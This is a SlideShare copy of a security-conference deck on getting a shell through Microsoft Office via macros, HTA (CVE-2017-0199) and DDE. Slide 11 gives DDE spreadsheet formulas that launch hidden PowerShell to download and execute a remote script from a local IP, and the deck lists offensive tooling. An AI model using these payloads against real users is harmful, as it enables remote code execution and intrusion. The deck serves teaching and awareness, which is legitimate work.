SlideShare a Scribd company logo
GETTING A SHELL THROUGH
MS OFFICE
Velayutham Selvaraj , Msc Digital Forensics & Cyber Crime Analysis
CYBER PHOENIX CONCLAVE 2K18INFORMATION SECURITY CONFERENCE
1
$ ECHO BRAG
CEO of TwinTech Solutions Pvt Ltd
Co-Founder Of Talented Pentesters Hut
Certified CEH ECSA LPT CHFI etc List goes on
Trained 1000’s of Individuals working in Top Mnc like Infosys, TCS etc
FreeLancer
Techincal Author at GB Hackers
Cyber Forensic Researcher
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
2
MACROS HTA DDE
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
3
MACROS
• Microsoft Office documents — Word,
Excel, PowerPoint, and other types of
documents — can contain embedded
code written in a programming language
known as Visual Basic for Applications
• Macros can be embedded with malicious
scripts to execute once enabled
• Still Widely used and some of the more
prominent threats at the time ran forms of
malware such as DRIDEX, ROVNIX and
VAWTRA
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
4
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
5
HTA
• An HTML Application (HTA) is a Microsoft Windows
program whose source code consists of HTML,
Dynamic HTML, and one or more scripting
languages CVE-2017-0199 HTA Handler Vulnerability
• OLE (Object Linking and Embedding) is Microsoft's
framework for a compound document technology.
• Briefly, a compound document is something like a
display desktop that can contain visual and
information objects of all kinds: text, calendars,
animations, sound, motion video, 3-D, continually
updated news, controls, and so forth.
• Part of Microsoft's ActiveX technologies, OLE takes
advantage and is part of a larger, more general
concept, the Component Object Model (COM) and
its distributed version, DCOM.
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
6
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
7
DDE
Dynamic Data Exchange sends messages between applications that share data
and uses shared memory to exchange data between applications.
Applications can use the DDE protocol for one-time data transfers and for
continuous exchanges in which applications send updates to one another as
new data becomes available.
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
8
REAL TIME USES
Linking to real-time data,
such as to stock market
updates, Inventory
management , or process
control.
01
Creating compound
documents, such as a word
processing document that
includes a chart produced
by a graphics application.
02
Using DDE, the chart will
change when the source
data is changed, while the
rest of the document
remains the same.
03
Performing data queries
between applications, such
as a spreadsheet querying a
database for accounts past
due.
04
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
9
TOOLS REQUIRED
KALI LINUX OR METASPLOIT OR EMPIRE
FATRAT
MICROSOFT OFFICE (ANY VERSION)
MICROSOFT WINDOWS
BASIC KNOWLEDGE ABOUT NETWORKING AND PORTFORWARDING
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
10
UNDERSTAND THE CODE
• =cmd|'/c calc.exe'!_xlbgnm.A1
• =cmd|'/c powershell.exe -w hidden $e=(New-Object
System.Net.WebClient).DownloadString("http://192.168.0.8/cyberconclave.ps1");IE
X $e'!_xlbgnm.A1
• =MSEXCEL|'......WindowsSystem32cmd.exe /c powershell.exe -nop -w 1
$e=(New-Object
System.Net.WebClient).DownloadString("http://192.168.0.8/hello.ps1"); IEX
$e'!_xlbgnm.A1
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
11
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
12
DEMO TIME
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
13
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
14
HOW TO BE
SAFE
Buy a good antivirus,
you never leave your
door open.
Do the same for your
computers, laptops &
smart phones
Never keep the same
passwords
Change your
passwords regularly
Use lastpass to store
your passwords
Use veracrypt to
encrypt sensitive
information
There is no 100%
Security nor 100%
Anonymity
Last but not least is
common sense
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
15
THANK YOU
LETS MAKE A
RESPONSIBLE AND SAFE
CYBER WORLD
1
HEED TO ADVICES OF
YOUR FELLOW MEN
2
RESPECT EVERYONE AND
SPREAD LOVE WITHIN
THE COMMUNITY
3
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
16
FEEL FREE TO CONTACT ME
ANYTIME
• VELAYUTHAM@TWINTECHSOLUTIONS.IN
• FB.COM/LAWWAY09
• 9677034266
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
17
SOURCED FROM
• http://searchwindowsserver.techtarget.com/definition/OLE-Object-Linking-and-
Embedding
• https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-
vulnerability/
• https://msdn.microsoft.com/en-
us/library/windows/desktop/ms648774(v=vs.85).aspx
• https://www.harmj0y.net/blog/empyre/os-x-office-macros-with-empyre/
• https://github.com/Screetsec/TheFatRat
• https://www.kali.org/downloads/
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
18

More Related Content

Similar to Getting A Shell Through MS Office - CYBER PHOENIX CONCLAVE 2K18 INFORMATION SECURITY CONFERENCE

Martin Koons Resume 2015
Martin Koons Resume 2015Martin Koons Resume 2015
Martin Koons Resume 2015Marty Koons
 
Best software development tools in 2021
Best software development tools in 2021Best software development tools in 2021
Best software development tools in 2021
Samaritan InfoTech
 
John Haggins Res2015
John Haggins Res2015John Haggins Res2015
John Haggins Res2015John Haggins
 
An isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra dasAn isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra das
Vikash Chandra Das
 
Introducing the Open Container Project
Introducing the Open Container ProjectIntroducing the Open Container Project
Introducing the Open Container Project
Andrew Kennedy
 
Article 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docxArticle 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docx
rossskuddershamus
 
Online lg prodect
Online lg prodectOnline lg prodect
Online lg prodect
Yesu Raj
 
Documentation
DocumentationDocumentation
Documentation
Rajesh Seendripu
 
Crash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud ComputingCrash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud Computing
Mark Hinkle
 
Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015Peter Gervais
 
SLUGUK BUILD Round-up
SLUGUK BUILD Round-upSLUGUK BUILD Round-up
SLUGUK BUILD Round-up
Derek Lakin
 
A Platform for Application Risk Intelligence
A Platform for Application Risk IntelligenceA Platform for Application Risk Intelligence
A Platform for Application Risk Intelligence
Checkmarx
 
Cloud Computing
Cloud ComputingCloud Computing
Cloud Computing
Khushboo Wadhwani
 
Sreerag dot net - objectives & architecture
Sreerag   dot net - objectives & architectureSreerag   dot net - objectives & architecture
Sreerag dot net - objectives & architectureSreerag Gopinath
 
Introduction to vb.net
Introduction to vb.netIntroduction to vb.net
Introduction to vb.net
suraj pandey
 

Similar to Getting A Shell Through MS Office - CYBER PHOENIX CONCLAVE 2K18 INFORMATION SECURITY CONFERENCE (20)

dot NET Framework
dot NET Frameworkdot NET Framework
dot NET Framework
 
Mohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub_CV
Mohamed Mahgoub_CV
 
Martin Koons Resume 2015
Martin Koons Resume 2015Martin Koons Resume 2015
Martin Koons Resume 2015
 
Best software development tools in 2021
Best software development tools in 2021Best software development tools in 2021
Best software development tools in 2021
 
C# chap 2
C# chap 2C# chap 2
C# chap 2
 
Windows dna
Windows dnaWindows dna
Windows dna
 
John Haggins Res2015
John Haggins Res2015John Haggins Res2015
John Haggins Res2015
 
An isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra dasAn isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra das
 
Introducing the Open Container Project
Introducing the Open Container ProjectIntroducing the Open Container Project
Introducing the Open Container Project
 
Article 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docxArticle 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docx
 
Mca 504 dotnet_unit1
Mca 504 dotnet_unit1Mca 504 dotnet_unit1
Mca 504 dotnet_unit1
 
Online lg prodect
Online lg prodectOnline lg prodect
Online lg prodect
 
Documentation
DocumentationDocumentation
Documentation
 
Crash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud ComputingCrash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud Computing
 
Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015
 
SLUGUK BUILD Round-up
SLUGUK BUILD Round-upSLUGUK BUILD Round-up
SLUGUK BUILD Round-up
 
A Platform for Application Risk Intelligence
A Platform for Application Risk IntelligenceA Platform for Application Risk Intelligence
A Platform for Application Risk Intelligence
 
Cloud Computing
Cloud ComputingCloud Computing
Cloud Computing
 
Sreerag dot net - objectives & architecture
Sreerag   dot net - objectives & architectureSreerag   dot net - objectives & architecture
Sreerag dot net - objectives & architecture
 
Introduction to vb.net
Introduction to vb.netIntroduction to vb.net
Introduction to vb.net
 

Recently uploaded

20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
Alex Pruden
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 

Recently uploaded (20)

20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 

Getting A Shell Through MS Office - CYBER PHOENIX CONCLAVE 2K18 INFORMATION SECURITY CONFERENCE

  • 1. GETTING A SHELL THROUGH MS OFFICE Velayutham Selvaraj , Msc Digital Forensics & Cyber Crime Analysis CYBER PHOENIX CONCLAVE 2K18INFORMATION SECURITY CONFERENCE 1
  • 2. $ ECHO BRAG CEO of TwinTech Solutions Pvt Ltd Co-Founder Of Talented Pentesters Hut Certified CEH ECSA LPT CHFI etc List goes on Trained 1000’s of Individuals working in Top Mnc like Infosys, TCS etc FreeLancer Techincal Author at GB Hackers Cyber Forensic Researcher ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 2
  • 3. MACROS HTA DDE ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 3
  • 4. MACROS • Microsoft Office documents — Word, Excel, PowerPoint, and other types of documents — can contain embedded code written in a programming language known as Visual Basic for Applications • Macros can be embedded with malicious scripts to execute once enabled • Still Widely used and some of the more prominent threats at the time ran forms of malware such as DRIDEX, ROVNIX and VAWTRA ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 4
  • 5. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 5
  • 6. HTA • An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages CVE-2017-0199 HTA Handler Vulnerability • OLE (Object Linking and Embedding) is Microsoft's framework for a compound document technology. • Briefly, a compound document is something like a display desktop that can contain visual and information objects of all kinds: text, calendars, animations, sound, motion video, 3-D, continually updated news, controls, and so forth. • Part of Microsoft's ActiveX technologies, OLE takes advantage and is part of a larger, more general concept, the Component Object Model (COM) and its distributed version, DCOM. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 6
  • 7. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 7
  • 8. DDE Dynamic Data Exchange sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 8
  • 9. REAL TIME USES Linking to real-time data, such as to stock market updates, Inventory management , or process control. 01 Creating compound documents, such as a word processing document that includes a chart produced by a graphics application. 02 Using DDE, the chart will change when the source data is changed, while the rest of the document remains the same. 03 Performing data queries between applications, such as a spreadsheet querying a database for accounts past due. 04 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 9
  • 10. TOOLS REQUIRED KALI LINUX OR METASPLOIT OR EMPIRE FATRAT MICROSOFT OFFICE (ANY VERSION) MICROSOFT WINDOWS BASIC KNOWLEDGE ABOUT NETWORKING AND PORTFORWARDING ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 10
  • 11. UNDERSTAND THE CODE • =cmd|'/c calc.exe'!_xlbgnm.A1 • =cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://192.168.0.8/cyberconclave.ps1");IE X $e'!_xlbgnm.A1 • =MSEXCEL|'......WindowsSystem32cmd.exe /c powershell.exe -nop -w 1 $e=(New-Object System.Net.WebClient).DownloadString("http://192.168.0.8/hello.ps1"); IEX $e'!_xlbgnm.A1 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 11
  • 12. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 12
  • 13. DEMO TIME ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 13
  • 14. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 14
  • 15. HOW TO BE SAFE Buy a good antivirus, you never leave your door open. Do the same for your computers, laptops & smart phones Never keep the same passwords Change your passwords regularly Use lastpass to store your passwords Use veracrypt to encrypt sensitive information There is no 100% Security nor 100% Anonymity Last but not least is common sense ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 15
  • 16. THANK YOU LETS MAKE A RESPONSIBLE AND SAFE CYBER WORLD 1 HEED TO ADVICES OF YOUR FELLOW MEN 2 RESPECT EVERYONE AND SPREAD LOVE WITHIN THE COMMUNITY 3 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 16
  • 17. FEEL FREE TO CONTACT ME ANYTIME • VELAYUTHAM@TWINTECHSOLUTIONS.IN • FB.COM/LAWWAY09 • 9677034266 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 17
  • 18. SOURCED FROM • http://searchwindowsserver.techtarget.com/definition/OLE-Object-Linking-and- Embedding • https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler- vulnerability/ • https://msdn.microsoft.com/en- us/library/windows/desktop/ms648774(v=vs.85).aspx • https://www.harmj0y.net/blog/empyre/os-x-office-macros-with-empyre/ • https://github.com/Screetsec/TheFatRat • https://www.kali.org/downloads/ ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 18

Editor's Notes

  1. There’s a great 2011 StackOverflow post that describes how to use the system() call exposed from libc in order to execute shell commands from VBA macro scripts.